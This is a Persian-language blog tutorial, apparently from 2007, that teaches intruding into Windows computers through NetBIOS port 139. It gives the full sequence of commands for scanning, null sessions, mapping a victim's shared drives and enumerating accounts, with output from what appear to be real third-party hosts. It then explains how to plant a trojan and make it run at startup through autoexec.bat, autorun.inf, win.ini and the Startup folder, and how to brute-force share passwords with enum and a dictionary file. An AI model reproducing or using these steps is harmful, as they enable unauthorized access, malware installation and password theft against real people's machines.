آموزش هک کردن به صورت حرفه اي

۱۳۸۵ دی ۱۹, سه‌شنبه ۱۰:۲۵ By Hamedan , In

آمورش های که تو عمر گرانبهایتان ندیده اید

ـ چگونه با پورت 139 صحبت كنيم ؟

۱- اولين کاري که مي‌کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي‌کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي‌دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:

Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port       State       Service
139/tcp    open        netbios-ssn             
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP

اين خروجي اعلام مي‌کند که پورت ۱۳۹ باز است. پس مي‌شود از اين ip استفاده کرد.

۲- حالا مي‌خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي‌کند. کامنت پرامت را باز کرده و دستور زير را مي‌نويسم:

nbtstat -A 217.218.84.29

دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر‌هاي بسياري است که اگه مي‌خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه‌ کاري مي‌کنه و خروجي به چه صورتي است:
اين دستور به
ip مورد نظر وصل مي‌شه و از اون مي‌خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام
Host not found بشم. اين يعني اينکه نمي‌تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:

           NetBIOS Remote Machine Name Table
 
       Name               Type         Status
    ---------------------------------------------
    HOME-TU6U0AV86Y<00>  UNIQUE      Registered
    MSHOME         <00>  GROUP       Registered
    HOME-TU6U0AV86Y<20>  UNIQUE      Registered
    MSHOME         <1EGROUP       Registered
 
    MAC Address = 00-53-45-00-00-00


۳- در اين نتايج چيزي که به درد مي‌خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي‌تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي‌خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي‌دهيم. حالا مي‌نويسم:

net view 217.218.84.29

حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد

System error 5 has occurred.
 
Access is denied.

اين يعني نمي‌تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي‌تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز‌هاي سري NT جواب ميده. مي‌نويسيد:

net use 217.218.84.29IPC$ "" /user:""

حالا چرا مي‌گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي‌تونم دوباره دستور net view 217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:

Shared resources at 217.218.84.29
 
Share name   Type         Used as  Comment
 
------------------------------------------------
Printer      Print                 Acrobat PDFWriter
Printer2     Print                 Acrobat Distiller
SharedDocs   Disk
The command completed successfully.

عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي‌نويسم.

۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي‌دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي‌کنيد، يک سري آيکون مي‌بينيد که هر کدام اسمي‌ دارند. مثلا :A براي فلاپي و و و تا مي‌رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين‌کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي‌کنم و دستور زير را مي‌نويسم:

net use L: 217.218.84.29SharedDocs

به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي‌گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي‌شنوم:

The command completed successfully.

معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي‌تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...

۵- وقتي کار تموم شد مي‌تونيد درايو رو حذف کنيد. براي اينکار مي‌تونين روي درايو رايت‌کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور

net use /delete L:

استفاده کنيد.

  ـ نكته تكنه !!

۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29 که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت217.218.84.29 که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ).
۲- من دارم به صورت استاندارد کار مي‌کنم. بعدا خواهم گفت که چطوري مي‌تونيم وقتي تو بعضي از مراحل متوقف مي‌شيم، اونو دور بزنيم.
۳- NetBIOS فقط براي کلاينت‌ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه داريد يک کلاينت رو هک مي‌کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روش‌هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش‌ها استفاده از يک سري نرم‌افزارهاي خاص است که تو درس بعدي توضيح مي‌دم و نيز يک روش ديگه اعمال تغييرات در فايل‌هاي HOST و LMHOST و استفاده از find در سيستم‌عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيش‌فرض در کامپيوتر فعال است، معمولا مشکلي نيست.

 ـ چگونه
NetBios رو روي كامپيوتر خودمون فعال كنيم ؟

براي غيرفعال کردن
NetBIOS در ويندوز با توجه به نوع آن ويندوز روش‌هاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است:

Win 2000

Win XP Home

Win XP Professional

Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok

 

Start > Programs > Administrative Tools > Local Security Settings > Local Policies >
1) Network Access: Do not allow anonymous enumeration of SAM accounts: Enabled
2) Network Access: Do not allow anonymous enumeration of SAM accounts and shares: Enabled

Start > Run > regedit > HKEY_LOCAL_MACHINE > HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > LSA > RestrictAnonymous=2

مي‌تونيد به کمک فايروال يا روتر پورت‌هاي زير را ببنديد:

135         TCP             DCE/RPC Portmapper
137         TCP/UDP         NetBIOS Name Service
138         TCP/UDP         NetBIOS Datagram Service
139         TCP             NetBIOS Session Service
445         TCP             Microsoft-DS (Windows 2000 CIFS/SMB)


۱- وقتي پورت ۱۳۹ رو مي‌بنديد، ديگه نمي‌تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در‌ آوريد). پس وقتي که کسي رو مي‌خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.

۲- مي‌بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.

۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش‌هاي بالا، گزينه‌اي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته‌ايم، شما Disable را انتخاب کنيد.

ـ چگونه از اين امكانات به اشتراك گذاشته شدهبراي اجراي يك ترجان استفاده كنيم


خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي‌کنم تو يکي از درس‌هاي آينده اونو توضيح بدم. ما اينجا مي‌خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجان به‌طور ساده برنامه‌اي اجرايي است، که ما براي طرف مقابل مي‌فرستيم و اگه طرف مقابل اونو اجرا کنه، ما مي‌تونيم کنترل سيستم‌ اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي‌دم.
حالا همان بحث تروجان ولي در رابطه با پورت
۱۳۹ :
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز
Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي‌کنم به اون کامپيوتر و اسمي براش انتخاب مي‌کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي‌ها مي‌کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي‌آد و فايل رو دابل کليک مي‌کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي‌شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي‌فرستيم و منتظر مي‌مونيم که طرف مقابل اجرا کنه.

حالا چند روش رو مطرح مي‌کنم که در شرايط خاص حالتي رو ايجاد مي‌کنه که نيازي با دابل‌کليک توسط قرباني نباشد:
۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d: ewfolder باشد، سطري که اضافه مي‌کنيم به صورت زير است:

d:
ewfolderali.exe

در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲- اگه به درايو C دسترسي داريد، مي‌تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) :

[autorun]
open=d:
ewfolderali.exe

۳- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:

run=d:
ewfolderali.exe

۵- اگه به فولدر ويندوز دسترسي داريد، مي‌تونيد تروجان رو به فولدر Start MenuStartup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست.

ـ ابزارهاي كمكي : 1.ابزارهاي خط فرماني


۱- enum :
اين برنامه را از
اينجا داون‌لود کنيد. enum نرم‌افزاري با قابليت‌هاي فوق‌العاده است. از جمله توانايي‌هايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد مي‌تونيم به کمک enum و ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مب‌دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراک‌هاي آن ip خاص در آن لحظه رو بدست بيارم:

enum -S 217.218.84.29

و جواب شنيدم:

server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
  EIPCDprintSharedDocs  FPrinter2  ADMINCPrinter
cleaning up... success.

ملاحظه مي‌فرماييد که درايو‌هاي E و D و F و C و نيز SharedDocs و .. ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ).

۲- nbtscan :
اين برنامه را از
اينجا داون‌لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که مي‌تونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راه‌حلي است براي سوالي که خيلي از شما دوستان پرسيده بودين. مثلا اگه بنويسم:

nbtscan -v -s : 195.219.49.0-30

که ليست اشتراک‌ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي‌شنوم:

195.219.49.1    Recvfrom failed: Connection reset by peer
195.219.49.5    Recvfrom failed: Connection reset by peer
195.219.49.6    Recvfrom failed: Connection reset by peer
195.219.49.7    Recvfrom failed: Connection reset by peer
195.219.49.8    Recvfrom failed: Connection reset by peer
195.219.49.12   Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE       :00U
195.219.49.23:ATINET_MRA     :00G
195.219.49.23:MRS.ZADE       :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP      :00G
195.219.49.26:WORKGROUP      :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP      :00G
195.219.49.22:WORKGROUP      :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA          :00U
195.219.49.29:WORKGROUP      :00G
195.219.49.29:TESSA          :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00

در مورد ip هايي که 20U را مي‌بينيد، يعني sharing رو ميشه استفاده کرد.

۳- winfo :
اينم از جمله برنامه‌هايي است که بايد بگم آخر برنامه است!! از
اينجا داون‌لود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ip رو تست مي‌کنه همه‌چي شو در رو مي‌کنه. (البته ميشه گفت همه اين کارها رو مي‌شه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :

winfo 195.219.49.184 -n -v

و به نتايج زير رسيدم:

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
          - http://www.ntsecurity.nu/toolbox/winfo/
 
Trying to establish null session...
 
Null session established.
 
 
SYSTEM INFORMATION:
 
 - OS version: 4.0
 
DOMAIN INFORMATION:
 
 - Primary domain (legacy): DSG
 - Account domain: TEHRAN
 
   Warning: Unable to retrieve domain DNS information.
   Reason : Not supported by the remote OS.
 
 
PASSWORD POLICY:
 
 - Time between end of logon time and forced logoff: No forced logoff
 - Maximum password age: 42 days
 - Minimum password age: 0 days
 - Password history length: 0 passwords
 - Minimum password length: 0 characters
 
LOCOUT POLICY:
 
 - Lockout duration: 30 minutes
 - Reset lockout counter after 30 minutes
 - Lockout threshold: 0
 
SESSIONS:
 
 - Computer: ARTAWILL-V0P1QR
 - User:
 
LOGGED IN USERS:
 
 * Administrator
 
USER ACCOUNTS:
 
 * Administrator
 
    - Password age: 666 days
    - Privilege level: Administrator
    - Home directory:
    - Home directory mapped as:
    - Comment: Built-in account for administering the computer/domain
    - Account is: Enabled
    - User can change password: Yes
    - Account is locked out: No
    - Password never expires: Yes
    - The account is: Normal user
    - Logon script path:
    - Full name:
    - User comment:
    - Can log in from workstations: All
    - Last logon to this DC / computer: Mon Mar 03 23:10:23 2003
    - Last logoff from this DC / computer: Tue Dec 11 23:57:37 2001
    - Account expires: Never
    - Max disk space: Unlimited
    - Failed logins in a row to this DC / computer: 0
    - Path to user profile:
    - Password has expired: No
 
   (This account is the built-in administrator account)
 
 * Guest
 
    - Password age: 680 days
    - Privilege level: Guest
    - Home directory:
    - Home directory mapped as:
    - Comment: Built-in account for guest access to the computer/domain
    - Account is: Disabled
    - User can change password: No
    - Account is locked out: No
    - Password never expires: Yes
    - The account is: Normal user
    - Logon script path:
    - Full name:
    - User comment:
    - Can log in from workstations: All
    - Last logon to this DC / computer: None
    - Last logon to this DC / computer: None
    - Account expires: Never
    - Max disk space: Unlimited
    - Failed logins in a row to this DC / computer: 0
    - Path to user profile:
    - Password has expired: No
 
   (This account is the built-in guest account)
 
 * TEST
 
    - Password age: 680 days
    - Privilege level: User
    - Home directory:
    - Home directory mapped as:
    - Comment:
    - Account is: Enabled
    - User can change password: Yes
    - Account is locked out: No
    - Password never expires: No
    - The account is: Normal user
    - Logon script path:
    - Full name:
    - User comment:
    - Can log in from workstations: All
    - Last logon to this DC / computer: None
    - Last logon to this DC / computer: None
    - Account expires: Never
    - Max disk space: Unlimited
    - Failed logins in a row to this DC / computer: 0
    - Path to user profile:
    - Password has expired: Yes
 
WORKSTATION TRUST ACCOUNTS:
 
INTERDOMAIN TRUST ACCOUNTS:
 
SERVER TRUST ACCOUNTS:
 
SHARES:
 
 * ADMIN$
 
    - Type: Special share reserved for IPC or administrative share
    - Remark: Remote Admin
 
 * IPC$
 
    - Type: Unknown
    - Remark: Remote IPC
 
 * C$
 
    - Type: Special share reserved for IPC or administrative share
    - Remark: Default share

بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي‌تونين، share ها رو ببينيد.

۴- NAT :
اين برنامه را از
اينجا داون‌لود کنيد. يکي از مهم‌ترين کاربرد‌هاي اون crack کردن پسورد sharing است ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مي‌نويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف براي خودتون )

۵- و ..

ـ ابزارهاي كمكي : 2.ابزارهاي گرافيكي

۱- netbrute :
اين برنامه را از
اينجا داون‌لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي‌کنم اگرچه به اندازه دو نرم‌افزار بعدي مشهور نيست. من نمي‌خوام روش کار با اينو توضيح بدم چون خيلي تابلو‌ ه! ضمنا اين نرم‌افزار داخل خودش يک پورت اسکنر هم داره که خيلي به درد مي‌خوره. حتما حتما حتما داون‌لود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين ازش. قرار نيست که همي‌چي رو من بهتون بگم !!

۲- Legion :
اگه بگم مشهورترين نرم‌افزار اسکن کردن پورت‌
۱۳۹ اين نرم‌افزاره، سخن گزافي نيست!! خيلي‌ها کشته مرده اون هستن ولي من زياد ازش خوشم نمي‌آد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول‌لود کنيد، اينجا رو کليک کنيد.

۳- DumpSec يا DumpACL :
اين هم خيلي معروفه. اگه خواستين مي‌تونين از
اينجا داون‌لود کنيد.


ـ آيا چيزي راجه به اين پورتها مونده كه بحث نشده باشه ؟
بله!
۱- يه نرم‌افزاري هست به اسم pqwak که اين‌طوري که مي‌گن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، مي‌تونه پسورد اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي‌کنه و اونو exploit مي‌کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينت‌اش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي‌خواين پيدا کنيد.
۲- ما بحث استفاده از نقاط ضعف پورت‌ها رو هنوز شروع نکرده‌ايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال روش‌هايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير مي‌کرديم رو دور بزنيم.

_ نكاتي راجه به
enum

خوب قبلا گفتم که
enum نرم‌افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي‌خوام دو کاربرد خاص از اونو براتون توضيح بدم:

۱- گرفتن password policy information :
در ويندوزهاي
NT مي‌شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده مي‌کنيم. مثلا مي‌نويسيم:

enum -P xxx.xxx.xxx.xxx

و جواب مي‌شنوم:

server: xxx.xxx.xxx.xxx
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
cleaning up... success.

خودتون که دارين مي‌بينين!

۲- استفاده از روش cracking براي پيدا کردن پسورد:
اگه با
NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت‌ها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نمي‌تونيد بکنيد. پس ما کاري که مي‌کنيم، اينه که يک سري پسورد را توسط enum تست مي‌کنيم که يکي جواب بده - يا اينکه نده !
اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو
crack کردن پسورد به روش brute force يا bf مي‌گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...
حالا چيري مي‌خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده مي‌کنن. براي پيدا کردن اين فايل‌ها که اصطلاحا
dictionary file ناميده مي‌شوند به صورت زير است:
الف) استفاده از ديکشنري‌هاي آماده مثل
The Argon که مشهورترين ديکشنري کرکينگ مي‌باشد با حجمي حدود ۲۴ مگابايت!
ب) بعضي وقت‌ها خودمون مي‌خواهيم يه ديکشنري بسازيم، در اين موارد کاري که مي‌کنيم اينه که از نرم‌افزارهاي سازنده ديکشنري استفاده مي‌کنيم. مثلا وقتي که شما مي‌دونيد که فلاني از پسوردهاي
۸ حرفي استفاده مي‌کنه و ... براي اين‌کار نرم‌افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ..

حالا که يه فايل ديکشنري دارم مي‌تونم کار کرک پسورد
NetBIOS رو شروع کنم. فرض کنيد که وقتي مي‌خوام Ali رو در يک ip به شماره xxx.xxx.xxx.xxx رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اين‌کار استفاده مي‌کنيم، اينه:

enum -D -f "theargon.lst" -u "Adel" xxx.xxx.xxx.xxx

حالا enum مياد و تمام پسوردها رو تست مي‌کنه تا ايشالله به جواب برسه!
اينقدر که از
enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد داره اينه که خيلي کند کار ميکنه. ممکنه ساعت‌ها وقت لازم باشه. راه‌حل چيه؟

0 نظرات: